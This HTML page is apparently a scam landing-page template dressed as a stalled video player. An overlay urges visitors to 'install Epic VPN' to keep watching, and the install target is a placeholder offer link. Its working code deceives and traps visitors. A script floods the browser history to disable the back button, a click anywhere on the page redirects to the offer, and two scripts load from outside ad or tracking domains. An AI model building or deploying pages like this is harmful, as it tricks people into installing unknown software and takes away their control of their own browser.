<!DOCTYPE html>
<html lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <script>
if (!!(window.history && history.pushState)) {
    (function (d, w, h) {
        if (!window.location.href.match('disbb=1')) {
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
            h.pushState(null, document.title, window.location.href);
        }
    })(document, window, history);
}
</script>
    
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Attention</title>
    <script src="./files/main.js"></script>
    <link rel="preconnect" href="{offer_link}">
    <link href="./files/css2" rel="stylesheet">

    <style>
* {
  margin: 0;
  padding: 0;
  -webkit-box-sizing: border-box;
          box-sizing: border-box;
}
html {
  font-size: 15px;
}
html,
body {
  width: 100%;
  height: 100%;
}
body {
  font-family: 'Roboto', sans-serif;
  position: relative;
  background-color: #454545;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
      -ms-flex-pack: center;
          justify-content: center;
}
@-webkit-keyframes show {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
@keyframes show {
  0% {
    opacity: 0;
  }
  100% {
    opacity: 1;
  }
}
@-webkit-keyframes hidden {
  100% {
    opacity: 0;
  }
}
@keyframes hidden {
  100% {
    opacity: 0;
  }
}
.wrapper {
  position: absolute;
  margin-bottom: 100px;
  width: 95%;
  max-width: 350px;
  background: #f2f2f2;
  border-radius: 4px;
  z-index: 100;
  -webkit-animation: show 1.2s steps(1, end) 1;
          animation: show 1.2s steps(1, end) 1;
}
.top_wrapper {
  padding: 20px 17px 25px;
  width: 100%;
  text-align: left;
}
.top_wrapper h1 {
  text-transform: capitalize;
  font-size: 1.2rem;
  font-weight: 700;
}
.top_wrapper p {
  margin-top: 12px;
}
.button {
  width: 100%;
  font-size: 1.1rem;
  font-weight: 500;
  text-transform: uppercase;
  text-align: right;
  padding: 0 20px 18px 0;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
    -webkit-box-pack: end;
    -webkit-justify-content: flex-end;
        -ms-flex-pack: end;
            justify-content: flex-end;
}
.button p {
  color: #12b7b1;
}
.button p:hover {
  color: #0c9893;
  cursor: pointer;
}
.player {
  width: 100%;
  max-width: 850px;
  height: 60vh;
  position: relative;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-orient: vertical;
  -webkit-box-direction: normal;
  -webkit-flex-direction: column;
      -ms-flex-direction: column;
          flex-direction: column;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
  padding: 10px 15px;
  background: #000;
}
.top_icons {
  position: absolute;
  top: 10px;
  left: 20px;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: start;
  -webkit-align-items: flex-start;
      -ms-flex-align: start;
          align-items: flex-start;
  -webkit-box-pack: start;
  -webkit-justify-content: flex-start;
      -ms-flex-pack: start;
          justify-content: flex-start;
}
.top_icons img {
  width: 35px;
  cursor: pointer;
}
.top_icons img:first-child {
  margin-right: 14px;
}
.player_content {
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-flex: 1;
  -webkit-flex-grow: 1;
      -ms-flex-positive: 1;
          flex-grow: 1;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
      -ms-flex-pack: center;
          justify-content: center;
  position: relative;
  width: 100%;
}
.player_content img {
  padding-top: 50px;
  position: absolute;
}
.player_content .loading {
  width: 35px;
  -webkit-animation: hidden 0.9s steps(1, end) forwards;
          animation: hidden 0.9s steps(1, end) forwards;
}
.player_content .play {
  width: 70px;
  opacity: 0;
  -webkit-animation: show 0.9s steps(1, end) forwards;
          animation: show 0.9s steps(1, end) forwards;
}
.pause_play {
  position: relative;
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
}
.pause_play img:first-child {
  position: absolute;
  opacity: 0;
  -webkit-animation: show 0.9s steps(1, end) forwards;
          animation: show 0.9s steps(1, end) forwards;
}
.pause_play img:last-child {
  -webkit-animation: hidden 0.9s steps(1, end) forwards;
          animation: hidden 0.9s steps(1, end) forwards;
}
.player_navigation {
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
  -webkit-box-pack: justify;
  -webkit-justify-content: space-between;
      -ms-flex-pack: justify;
          justify-content: space-between;
  width: 100%;
}
.player_navigation_item {
  display: -webkit-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
      -ms-flex-align: center;
          align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
      -ms-flex-pack: center;
          justify-content: center;
}
.player_navigation_item img {
  height: 20px;
  cursor: pointer;
}
.player_navigation_item p {
  font-size: 0.8rem;
  margin-left: 12px;
  color: #fff;
}
.player_navigation_item:last-child img {
  margin-right: 15px;
}
.player_navigation_item:last-child img:last-child {
  margin-right: 0;
}
.progress {
  -webkit-box-flex: 1;
  -webkit-flex: 1;
      -ms-flex: 1;
          flex: 1;
  height: 4px;
  background: rgba(255, 255, 255, 0.4);
  margin: 0 12px;
  position: relative;
  cursor: pointer;
}
.progress_load {
  width: 0%;
  height: 100%;
  background: rgba(255, 255, 255, 0.4);
  -webkit-animation: progress_load 20s linear forwards;
          animation: progress_load 20s linear forwards;
}
.progress_line {
  width: 0%;
  height: 100%;
  background: #4080ff;
  -webkit-animation: progress_line 1s linear forwards;
          animation: progress_line 1s linear forwards;
}
@-webkit-keyframes progress_load {
  0% {
    width: 0;
  }
  100% {
    width: 50%;
  }
}
@keyframes progress_load {
  0% {
    width: 0;
  }
  100% {
    width: 50%;
  }
}
@-webkit-keyframes progress_line {
  0% {
    width: 0;
  }
  100% {
    width: 10px;
  }
}
@keyframes progress_line {
  0% {
    width: 0;
  }
  100% {
    width: 10px;
  }
}
/*************** media queries start ***********/
@media screen and (max-width: 992px) {
  .player {
    height: 75vh;
  }
}
@media screen and (max-width: 768px) {
  .player {
    height: 42vh;
  }
}
@media screen and (max-width: 768px) and (orientation: landscape) {
  .player {
    height: 80vh;
  }
}
@media screen and (max-width: 440px) {
  .top_icons {
    top: 10px;
    left: 15px;
  }
  .top_icons img {
    width: 28px;
  }
  .top_icons img:first-child {
    margin-right: 12px;
  }
  .player_content img {
    padding-top: 25px;
  }
  .player_content .loading {
    width: 30px;
  }
  .player_content .play {
    width: 60px;
  }
  .player_navigation_item:last-child img {
    margin-right: 10px;
  }
  .player_navigation_item:last-child img:last-child {
    margin-right: 0;
  }
  .player_navigation_item img {
    height: 18px;
  }
}
@media screen and (max-width: 320px), screen and (max-width: 480px) and (orientation: landscape) {
  html {
    font-size: 14px;
  }
  .top_icons {
    top: 10px;
    left: 15px;
  }
  .top_icons img {
    width: 28px;
  }
  .top_icons img:first-child {
    margin-right: 12px;
  }
  .player_content img {
    padding-top: 20px;
  }
}
@media screen and (max-width: 840px) and (max-height: 440px) and (orientation: landscape) {
  body {
    -webkit-box-align: start;
    -webkit-align-items: flex-start;
        -ms-flex-align: start;
            align-items: flex-start;
  }
  .player {
    width: 100%;
    height: 100%;
  }
  .player_content img {
    padding-top: 0;
  }
}
/*************** media queries FOR WRAPPER ONLY ***********/
@media screen and (max-width: 320px), screen and (max-width: 480px) and (orientation: landscape) {
  .wrapper {
    max-width: 320px;
  }
  .top_wrapper {
    padding: 17px;
  }
  .top_wrapper h1 {
    font-size: 1.3rem;
  }
}
@media screen and (max-width: 840px) and (max-height: 440px) and (orientation: landscape) {
  .wrapper {
    margin-bottom: 0;
    margin-top: 5px;
  }
  .top_wrapper {
    padding: 13px 15px;
  }
  .top_wrapper h1 {
    font-size: 1.25rem;
  }
  .top_wrapper p {
    margin-top: 8px;
  }
}
    </style>


<body onclick="window.location.href='{offer_link}'">
    <div class="wrapper">
        <div class="top_wrapper">
            <h1>Attention!</h1>
            <p>Please install Epic VPN  and continue watching content in safe mode.</p>
        </div>
        <div class="button">
            <p><a href="{offer_link}">Install</a></p>
        </div>
    </div>
    <section class="player">
        <div class="player_content">
            <img class="loading" src="./files/loading.svg" alt="">
            <img class="play" src="./files/play_pic.svg" alt="">
        </div>
        <div class="top_icons">
            <img src="./files/close.svg">
        </div>
        <div class="player_navigation">
            <div class="player_navigation_item">
                <div class="pause_play">
                    <img src="./files/play.svg" alt="">
                    <img src="./files/pause.svg" alt="">
                </div>
                <p>00:0<span id="counter_wrapper">2</span>/1:52:46</p>
            </div>
            <div class="progress">
                <div class="progress_load">
                    <div class="progress_line"></div>
                </div>
            </div>
            <div class="player_navigation_item">
                <img class="img_padding" src="./files/settings.svg" alt="">
                <img src="./files/minimize.svg" alt="">
                <img src="./files/full.svg" alt="">
                <img src="./files/volume.svg" alt="">
            </div>
        </div>
    </section>


<script>
    const node = document.querySelector('#counter_wrapper');

    $.counter({
        start: 1,
        end: 2,
        display: node,
        interval: 1000,
    });
</script>

<script type="text/javascript">
    const time_wait= 0;
    const blackout=0;
    const yaban = 0;
    const title = "";
    const desc = "";
</script>
<script type="text/javascript" src="https://news-zacine.com/code/https-v2.js?uid=167349&site=1222273298&banadu=0&sub1=sub1&sub2=sub2&sub3=sub3&sub4=sub4" async></script>
<script type="text/javascript" src="https://news-regode.com/process.js?id=1222273298&p1=sub1&p2=sub2&p3=sub3&p4=sub4" async></script>

</body>

</html>
